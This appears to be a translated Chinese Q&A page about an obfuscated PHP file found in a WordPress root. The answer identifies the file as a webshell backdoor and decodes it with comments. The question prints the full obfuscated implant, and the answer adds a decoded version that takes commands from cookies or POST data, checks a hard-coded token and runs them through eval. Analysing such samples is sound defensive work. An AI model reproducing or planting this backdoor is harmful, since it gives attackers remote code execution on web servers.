问题描述
我在我的 WordPress(WP)根目录中发现了一个新文件,其内容如下:
<?php ${"x47x4cx4fx42x41x4cx53"}["jdx67fx6fx77x6a"]="x64x61x74x61x5fx6bey";${"x47x4cx4fx42x41x4cx53"}["cx63x78x72x6ex73wx72x78x68"]="x64x61x74x61";${"x47x4cx4fBx41Lx53"}["gljjdjxqx74e"]="x64ax74x61";$hdhravkt="dx61x74a";${"x47x4cx4fx42Ax4cx53"}["ox74x7ax71x71lx6a"]="x76alx75e";${"x47Lx4fx42x41x4cS"}["pvvlx67x63x68"]="ax75x74x68";${"x47Lx4fx42Ax4cS"}["mx70x71x6ex63ifx6bx65mn"]="x6bx65y";${"x47x4cx4fx42x41x4cx53"}["x6dx71x65x6fsx70x70x62i"]="x6a";${"x47x4cOx42x41LS"}["x6bx6dbx68ix66x62"]="x69";${"x47x4cx4fBx41x4cS"}["x77mux70wxx62x65x6am"]="x6fut_x64x61x74x61";@ini_set("x65rrox72x5fx6cx6fg",NULL);@ini_set("x6cx6fgx5ferx72x6fx72s",0);@ini_set("maxx5fexex63x75tx69x6fx6ex5ftx69x6dx65",0);${"Gx4cOBx41Lx53"}["nx6bx6ax70x65x76fx6cyx79"]="x64x61x74x61x5fx6bx65x79";$orxtlbuxdn="x64x61tx61";@set_time_limit(0);if(!defined("Px48x50_x45x4fL")){define("Px48Px5fx45OL","n");}$cfusxjrfhr="vax6cue";if(!defined("Dx49x52ECTx4fx52x59_SEx50Ax52x41x54x4fR")){define("DIx52x45x43x54x4fx52Y_Sx45x50x41RATOx52","/");}${$orxtlbuxdn}=NULL;$scrxtpm="dx61x74x61";${${"x47x4cx4fBx41Lx53"}["x6ekx6ax70x65vfx6cx79x79"]}=NULL;$GLOBALS["x61uth"]="4ef6x33x61x62e-x31x61x62d-x34x35x61x36-913d-6x66x62x399x36x357x65x32x34b";global$auth;${"Gx4cOx42ALx53"}["x67x71cx71x69x61gtkd"]="x61x75x74x68";function 
sh_decrypt_phase($data,$key){$lougpr="i";${"Gx4cx4fBx41x4cx53"}["x78x79x75x6bx73x79x6ex6bx73"]="x64ax74x61";${${"Gx4cOx42x41x4cS"}["wx6dx75px77x78bx65x6ax6d"]}="";for(${${"x47LOx42Ax4cS"}["x6bx6dx62x68x69x66x62"]}=0;${$lougpr}<strlen(${${"x47Lx4fBALx53"}["xx79x75x6bx73x79x6ex6bs"]});){${"x47x4cx4fx42x41LS"}["nix6dzx78x6c"]="x6a";$jplufmtpaem="i";$dxzvtliuv="dax74x61";for(${${"x47LOx42ALS"}["x6dx71x65x6fsx70px62x69"]}=0;${${"x47Lx4fBx41x4cS"}["mx71x65x6fx73x70x70bi"]}<strlen(${${"x47x4cOBx41Lx53"}["x6dpqx6ex63x69x66x6bx65x6dx6e"]})&&${${"GLOx42x41LS"}["kx6dx62x68x69x66b"]}<strlen(${$dxzvtliuv});${${"Gx4cx4fx42ALx53"}["x6eix6dx7ax78x6c"]}++,${$jplufmtpaem}++){${"x47Lx4fx42x41x4cx53"}["wfx6cx79x6ehx75x6cx72x72"]="x6fx75x74_x64x61x74x61";${"x47LOx42x41x4cS"}["pcnbx79x71sx63x74x61x6f"]="x64x61x74x61";$kslqcnjzpl="j";${${"x47x4cx4fx42x41LS"}["wfx6cx79x6ehx75lx72x72"]}.=chr(ord(${${"GLOx42Ax4cx53"}["x70x63x6ebx79qx73cx74ax6f"]}[${${"x47x4cOx42x41x4cx53"}["x6bx6dx62x68ix66b"]}])^ord(${${"x47LOx42Ax4cx53"}["x6dpx71nx63x69x66x6bx65x6dx6e"]}[${$kslqcnjzpl}]));}}return${${"x47x4cx4fx42x41x4cS"}["wmux70x77x78x62x65jx6d"]};}function sh_decrypt($data,$key){$zhjqnlijbf="x6bx65x79";$rmzkqwtkh="x64x61x74a";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$rmzkqwtkh},${${"x47x4cOx42x41x4cx53"}["pvx76x6cgx63x68"]}),${$zhjqnlijbf});}foreach($_COOKIE as${${"x47x4cOx42Ax4cx53"}["x6dx70qx6ex63ix66x6bx65mx6e"]}=>${$cfusxjrfhr}){${"x47Lx4fx42x41x4cS"}["x72x72x6fvx74x68x66bx77x63"]="x64ax74x61";$xlaknbhqsh="dx61x74x61x5fx6bx65x79";${${"Gx4cx4fx42ALx53"}["rx72ovtx68fx62x77x63"]}=${${"x47x4cx4fBx41x4cx53"}["x6fx74zx71x71x6cx6a"]};${$xlaknbhqsh}=${${"x47x4cx4fx42ALx53"}["mpx71nx63ix66kx65x6dx6e"]};}if(!${$scrxtpm}){${"x47Lx4fx42ALx53"}["ax63x69px66x72x69i"]="x76x61lx75x65";foreach($_POST 
as${${"x47x4cOx42x41x4cx53"}["x6dx70x71x6ex63ix66x6bx65mx6e"]}=>${${"x47x4cOBx41x4cS"}["ax63x69px66x72x69i"]}){${"x47Lx4fBx41x4cx53"}["mx67bx70yux78x61"]="x64ax74ax5fkx65x79";${"Gx4cOBALx53"}["x64rx6awkx67x68g"]="kex79";${${"x47x4cx4fBx41x4cS"}["ccx78x72x6ex73x77rxx68"]}=${${"x47x4cOx42x41LS"}["ox74x7ax71qx6cj"]};${${"x47x4cx4fBx41Lx53"}["x6dx67x62x70x79x75x78x61"]}=${${"x47x4cx4fx42x41x4cx53"}["drx6awkx67x68x67"]};}}${${"x47Lx4fBx41x4cS"}["x63x63x78x72x6ex73wx72x78x68"]}=@unserialize(sh_decrypt(@base64_decode(${${"x47x4cx4fx42Ax4cx53"}["x63x63x78x72x6eswx72xx68"]}),${${"Gx4cx4fx42Ax4cx53"}["x6ax64x67fx6fx77j"]}));if(isset(${${"x47x4cx4fx42x41Lx53"}["gx6cx6ajx64x6ax78x71x74x65"]}["ax6b"])&&${${"x47x4cx4fx42Ax4cS"}["x67x71cqix61gtx6bx64"]}==${$hdhravkt}["x61k"]){$efxgmzy="x64x61x74x61";if(${${"Gx4cOx42x41x4cx53"}["x63x63xrx6esx77rxx68"]}["x61"]=="x69"){${${"Gx4cOBAx4cx53"}["kx6dx62x68x69x66x62"]}=Array("x70x76"=>@phpversion(),"x73x76"=>"1x2e0-x31",);echo@serialize(${${"x47x4cOx42Ax4cx53"}["kx6dx62hx69x66b"]});}elseif(${$efxgmzy}["x61"]=="e"){${"x47x4cOx42x41x4cx53"}["gx6cx6eewx69x6bx61"]="x64atx61";eval(${${"Gx4cx4fx42Ax4cS"}["x67x6cx6ex65wix6bx61"]}["d"]);}}
?>
这是什么?
最佳解决方案
这是一个恶意的远程 shell(webshell 后门)。下面是解码后的版本(上面的原始样本用 `\x` 十六进制转义和"变量的变量"来混淆;在本页的显示中反斜杠已丢失,例如 `x47x4cx4fx42x41x4cx53` 即 `GLOBALS`):
<?php
// Analyst annotation of the decoded sample (a reading aid, not code to run):
// the first thing the file does is suppress the traces an operator would
// normally look for. Error logging is turned off so failed attempts leave
// nothing in error_log, and the @ operator hides any warning from ini_set itself.
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
// Remove the execution time limit so long-running injected code is not cut off.
@ini_set("max_execution_time", 0);
@set_time_limit(0);
// Payload and the key used to decode it; both are filled from the request below.
$data = NULL;
$data_key = NULL;
// Hard-coded shared secret. A request must carry this exact value in its "ak"
// field before anything is executed. A fixed string like this is a usable
// file-content indicator for this particular sample.
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;
// Repeating-key XOR: each byte of $data is XORed with the byte of $key at the
// same offset modulo strlen($key) (the inner loop restarts $j at 0 while $i
// keeps advancing). XOR is its own inverse, so one routine both encodes and
// decodes. Note the transcription is not valid PHP as written: the outer for()
// header is missing its closing clause. Read it as a rendering of the
// obfuscated original, not as runnable code.
function sh_decrypt_phase($data, $key) {
$out_data = "";
for ($i = 0; $i < strlen($data) {
// Leftover from de-obfuscation: the original indirected $i through this name
// (${$jplufmtpaem}++); the variable is otherwise unused here.
$jplufmtpaem = "i";
for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) {
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
// Two XOR passes: first with the hard-coded $auth token, then with the
// caller-supplied $key (the name of the cookie or POST field that carried the
// payload). Two XOR layers are still just XOR, so this is obfuscation of the
// traffic, not encryption.
function sh_decrypt($data, $key) {
global $auth;
return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}
// Input channel: any cookie works as the carrier (the last one iterated wins),
// and the cookie's name doubles as the second XOR key. No WordPress API is
// used anywhere in the file; it is a standalone PHP backdoor dropped into the
// web root.
foreach($_COOKIE as $key => $value) {
$data = $value;
$data_key = $key;
}
// Fallback channel: the same convention over POST when no cookie was sent.
if(!$data) {
foreach($_POST as $key => $value) {
$data = $value;
$data_key = $key;
}
}
// base64 -> double XOR -> unserialize. Calling unserialize() on
// attacker-controlled bytes is dangerous on its own, independent of the eval
// below; the @ hides any decode failure.
$data = @unserialize(sh_decrypt(@base64_decode( $data ) , $data_key ));
// Gate: the decoded array must carry the hard-coded token under "ak".
if (isset($data["ak"]) && $auth == $data["ak"]) {
// Command "i": returns the PHP version and a shell version string "1.0-1",
// serialized. Presumably a liveness/fingerprint check by the operator.
if ($data["a"] == "i") {
$i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
echo @serialize($i);
}
// Command "e": arbitrary PHP supplied in "d" runs with the web server's
// privileges. This single line is what makes the file a backdoor; the
// obfuscation and the token gate likely exist to evade simple content scans
// and to keep other parties from using the implant.
elseif ($data["a"] == "e") {
eval($data["d"]);
}
}
?>
正如你所看到的,攻击者的载荷通过任意 Cookie(或 POST 参数)传入,经 base64 解码、用硬编码令牌和参数名做两轮 XOR 后再 unserialize;只要其中的 `ak` 与硬编码令牌匹配,最后执行的就是 `eval`,它会运行攻击者随请求注入的任意 PHP 代码。
参考文献